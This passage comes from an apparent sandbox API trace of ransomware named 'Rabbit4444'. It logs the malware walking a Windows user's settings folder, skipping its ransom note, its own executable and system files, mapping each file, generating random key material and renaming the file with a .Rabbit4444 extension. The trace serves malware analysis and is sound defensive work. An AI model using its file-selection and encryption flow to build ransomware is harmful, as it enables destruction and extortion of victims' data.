0x108bc8 [0056.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.414] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14772464807) returned 1 [0056.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.414] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.414] CloseHandle (hObject=0x298) returned 1 [0056.414] CloseHandle (hObject=0x278) returned 1 [0056.414] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPen.settingcontent-ms.Rabbit4444") returned 166 [0056.414] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPen.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppen.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPen.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppen.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.415] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf39de3dc, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf39de3dc, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", cAlternateFileName="AA8BAF~1.SET")) returned 1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2=".") returned 1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="..") returned 1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="windows") returned -1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="boot") returned -1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.415] lstrcmpiW (lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.415] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms") returned="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms" [0056.415] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.415] lstrlenW (lpString="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms") returned 57 [0056.415] lstrlenW (lpString="Rabbit4444") returned 10 [0056.416] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.416] lstrlenW (lpString=".dll") returned 4 [0056.416] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.416] lstrlenW (lpString=".lnk") returned 4 [0056.416] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.416] lstrlenW (lpString=".ini") returned 4 [0056.416] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.416] lstrlenW (lpString=".sys") returned 4 [0056.416] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.416] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppersonalizecolorchoose.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.416] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.416] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14772677415) returned 1 [0056.416] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1167) returned 1 [0056.416] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.416] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0056.416] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0056.417] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0056.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.418] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14772926474) returned 1 [0056.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0056.419] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.419] CloseHandle (hObject=0x298) returned 1 [0056.419] CloseHandle (hObject=0x278) returned 1 [0056.419] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms.Rabbit4444") returned 185 [0056.419] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppersonalizecolorchoose.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppersonalizecolorchoose.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.419] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf438dd12, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf438dd12, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", cAlternateFileName="AAAECF~1.SET")) returned 1 [0056.419] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.419] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2=".") returned 1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="..") returned 1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="windows") returned -1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="boot") returned -1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.420] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.420] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms") returned="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms" [0056.420] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.421] lstrlenW (lpString="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms") returned 58 [0056.421] lstrlenW (lpString="Rabbit4444") returned 10 [0056.421] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.421] lstrlenW (lpString=".dll") returned 4 [0056.421] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.421] lstrlenW (lpString=".lnk") returned 4 [0056.421] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.421] lstrlenW (lpString=".ini") returned 4 [0056.421] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.421] lstrlenW (lpString=".sys") returned 4 [0056.421] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.421] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepdisplayoff.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.421] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.421] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14773182225) returned 1 [0056.421] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1185) returned 1 [0056.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0056.421] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x298 [0056.422] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x70000 [0056.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.423] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.423] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.423] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.423] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.423] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14773424690) returned 1 [0056.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0056.424] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.424] CloseHandle (hObject=0x298) returned 1 [0056.424] CloseHandle (hObject=0x278) returned 1 [0056.424] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms.Rabbit4444") returned 186 [0056.424] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepdisplayoff.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepdisplayoff.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.425] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4557a73, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf4557a73, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", cAlternateFileName="AACD91~1.SET")) returned 1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2=".") returned 1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="..") returned 1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="windows") returned -1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="boot") returned -1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.425] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.425] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms") returned="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms" [0056.425] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.425] lstrlenW (lpString="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms") returned 62 [0056.425] lstrlenW (lpString="Rabbit4444") returned 10 [0056.426] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.426] lstrlenW (lpString=".dll") returned 4 [0056.426] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.426] lstrlenW (lpString=".lnk") returned 4 [0056.426] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.426] lstrlenW (lpString=".ini") returned 4 [0056.426] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.426] lstrlenW (lpString=".sys") returned 4 [0056.426] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.426] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepdisplayoffaoac.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.426] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.426] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14773686874) returned 1 [0056.426] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1205) returned 1 [0056.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.426] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0056.427] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0056.428] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x1016b0) returned 1 [0056.429] CryptGenRandom (in: hProv=0x1016b0, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0056.429] CryptReleaseContext (hProv=0x1016b0, dwFlags=0x0) returned 1 [0056.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.429] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14774013364) returned 1 [0056.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.429] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.430] CloseHandle (hObject=0x298) returned 1 [0056.430] CloseHandle (hObject=0x278) returned 1 [0056.430] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms.Rabbit4444") returned 190 [0056.430] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepdisplayoffaoac.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepdisplayoffaoac.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.431] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4852833, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf4852833, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x488, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", cAlternateFileName="AAF7F3~1.SET")) returned 1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2=".") returned 1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2="..") returned 1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2="windows") returned -1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2="boot") returned -1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", 